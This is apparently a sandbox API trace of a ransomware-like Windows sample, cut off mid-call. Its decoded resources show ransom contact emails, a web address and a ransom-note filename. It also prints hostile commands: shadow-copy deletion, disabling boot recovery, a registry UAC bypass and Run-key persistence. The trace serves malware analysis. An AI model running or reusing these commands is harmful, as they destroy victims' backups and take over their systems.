[0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0108.394] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0108.395] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0108.395] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0108.483] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0108.483] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0108.484] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0108.485] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0108.486] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0108.486] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0108.486] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0108.486] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0108.486] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0108.486] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0108.486] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0108.486] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0108.492] GetACP () returned 0x4e4 [0108.492] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0108.492] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wtsk8wxh.exe")) returned 0x30 [0108.492] GetTickCount () returned 0x25f6d [0108.492] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=16528157056) returned 1 [0108.492] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x56\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.492] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x79\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.492] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x53\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.492] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x57\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x68\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6f\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x50\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x46\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x69\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x42\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x45\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x32\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x66\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0108.493] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0108.493] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0108.493] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0108.493] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0108.493] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0108.493] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0108.493] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0108.493] LockResource (hResData=0x50d55c) returned 0x50d55c [0108.493] FreeResource (hResData=0x50d55c) returned 0 [0108.493] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.493] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.493] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.494] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.494] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0108.494] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.494] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.494] FreeResource (hResData=0x50d64c) returned 0 [0108.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1414f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.494] GetCurrentThreadId () returned 0xcb8 [0108.494] GetCurrentThreadId () returned 0xcb8 [0108.494] GetCurrentThreadId () returned 0xcb8 [0108.494] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0108.494] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x13d2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0108.494] GetCurrentThreadId () returned 0xcb8 [0108.494] GetCurrentThreadId () returned 0xcb8 [0108.494] GetCurrentThreadId () returned 0xcb8 [0108.494] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\Wtsk8WxH.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"LOCAL_3188F4D96148D062\" \"60000\"" [0108.494] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0108.494] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0108.494] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0108.496] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0108.497] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0108.498] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0108.498] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0108.499] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0108.500] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0108.500] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0108.501] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0108.503] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0108.503] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0108.503] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0108.503] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0108.503] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0108.503] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0108.503] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0108.503] LockResource (hResData=0x50d72c) returned 0x50d72c [0108.504] FreeResource (hResData=0x50d72c) returned 0 [0108.504] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0108.504] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0108.504] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0108.504] LockResource (hResData=0x50d64c) returned 0x50d64c [0108.504] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0108.504] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0108.504] FreeResource (hResData=0x50d64c) returned 0 [0108.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0108.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0108.504] GetCurrentThreadId () returned 0xcb8 [0108.504] GetCurrentThreadId () returned 0xcb8 [0108.504] GetCurrentThreadId () returned 0xcb8 [0108.504] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0108.504] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x13c9afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0108.505] GetCurrentThreadId () returned 0xcb8 [0108.505] GetCurrentThreadId () returned 0xcb8 [0108.505] GetCurrentThreadId () returned 0xcb8 [0108.505] GetCurrentThread () returned 0xfffffffe [0108.505] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0108.505] GetLastError () returned 0x3f0 [0108.505] GetCurrentProcess () returned 0xffffffff [0108.505] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0108.505] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x13c7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x13c7ae0, ReturnLength=0x12fc60) returned 1 [0108.505] CloseHandle (hObject=0xb8) returned 1 [0108.505] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x2a6460*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0108.505] EqualSid (pSid1=0x2a6460*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0108.505] EqualSid (pSid1=0x2a6460*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0108.505] EqualSid (pSid1=0x2a6460*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0108.505] GetCurrentProcess () returned 0xffffffff [0108.505] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0108.505] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0108.505] GetLastError () returned 0x7a [0108.505] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x2a7700 [0108.505] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x2a7700, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x2a7700, ReturnLength=0x12fc64) returned 1 [0108.505] GetSidSubAuthorityCount (pSid=0x2a7708*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, 